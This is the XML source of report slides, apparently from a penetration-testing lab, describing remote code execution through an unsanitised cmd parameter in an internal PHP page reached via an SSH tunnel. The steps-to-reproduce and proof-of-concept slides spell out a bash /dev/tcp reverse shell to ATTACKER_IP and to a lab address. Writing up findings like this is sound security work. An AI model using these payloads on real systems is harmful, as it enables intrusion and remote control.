              <a:t>Executed a reverse shell and took full control of the system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA8E7529-4CEB-F216-0187-392BBED5D238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="37465"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7990033" y="424624"/>
            <a:ext cx="3943549" cy="2442747"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CF40D8F-2EAE-DB5D-6D37-B6B4F0358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0032" y="3687991"/>
            <a:ext cx="3943550" cy="1252329"/>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608701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4A9BF-B126-5827-8202-02621648A1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286B86-5FBC-4C63-22F9-75C95131F92C}"/>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6F396DC2-9786-6EC5-5F7A-62CAE9C60E2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="7156174" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SSH into machine: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ssh jehad@192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Establish port forwarding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ssh -L 9999:127.0.0.1:9999 jehad@192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:9999/index.php?cmd=id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Run reverse shell:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=bash -c 'bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/ATTACKER_IP/9001 0&gt;&amp;1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observe command output.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allowed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>arbitrary command execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on the target system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enabled attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>spawn a reverse shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with remote control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Facilitated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>privilege escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and persistent backdoor access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Could be used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>exfiltrate data, create new users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or install malware.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C01BF005-7667-782E-D158-E48D7C078EF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7251467" y="1809205"/>
            <a:ext cx="4293601" cy="2823314"/>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052551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5192-FAC2-24EF-4A1E-B0CBCA8150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4B1A-89E1-0C65-783D-7A7CE18EE0F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>Remote Code Execution via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t> Parameter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4120980C-2492-022E-EADB-701B2A0BAC50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Remote Code Execution via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> Parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>The web application hosted on an internal service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0"/>
              <a:t>localhost:9999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>) contains an insecure implementation in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>, which accepts a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> parameter without input sanitization. This enables to execute arbitrary system commands remotely, including reverse shells, by accessing the parameter through SSH port forwarding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: URL:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:9999/index.php?cmd= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" dirty="0"/>
              <a:t>Parameter:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1900" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" i="1" dirty="0"/>
              <a:t>Critical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>This vulnerability allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>remote command execution with low complexity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>no user interaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>high impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> on confidentiality, integrity, and availability — resulting in full system compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Risk/Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Full System Compromise: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers gain shell access, enabling data theft, ransomware deployment, or cryptojacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lateral Movement: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compromised systems serve as entry points for internal network attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Data Breaches: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exfiltration of sensitive files (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/passwd, databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Denial of Service (DoS): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute resource-exhaustion commands (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>fork bomb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Recommendations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Input Validation &amp; Sanitization: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement allow-listing for permitted characters (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>alphanumeric only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) and block metacharacters     (;, &amp;, |). Use built-in sanitization functions (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>PHP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>escapeshellarg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Safe Command Execution APIs: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>system()/exec() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with parameterized APIs (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Java’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>ProcessBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>, Node.js’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>execFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Principle of Least Privilege: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run applications with minimal permissions (e.g., non-root users).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Patch Management: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Update third-party libraries and frameworks regularly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Web Application Firewall (WAF): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deploy rules to block command injection patterns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3015060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140F1-0E9C-9293-56C8-CA7B133D7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8D4BA5-B467-3633-0DCA-A4ED32D4091C}"/>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FC413E5C-097D-B128-9B96-F85AF569306D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="7285382" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score: 9.8 (Critical)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Reference: </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1700" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/Command_Injection</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1700" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1700" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.ssh.com/academy/ssh/tunneling-example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1700" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>After SSH access and port forwarding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ssh -L 9999:127.0.0.1:9999 jehad@192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Trigger RCE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:9999/index.php?cmd=id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reverse Shell: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:9999/index.php?cmd=bash -c 'bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/192.168.139.139/9001 0&gt;&amp;1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker accessed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and discovered internal port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>9999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Created SSH tunnel to expose local service</a:t>
            </a:r>
          </a:p>
          <a:p>
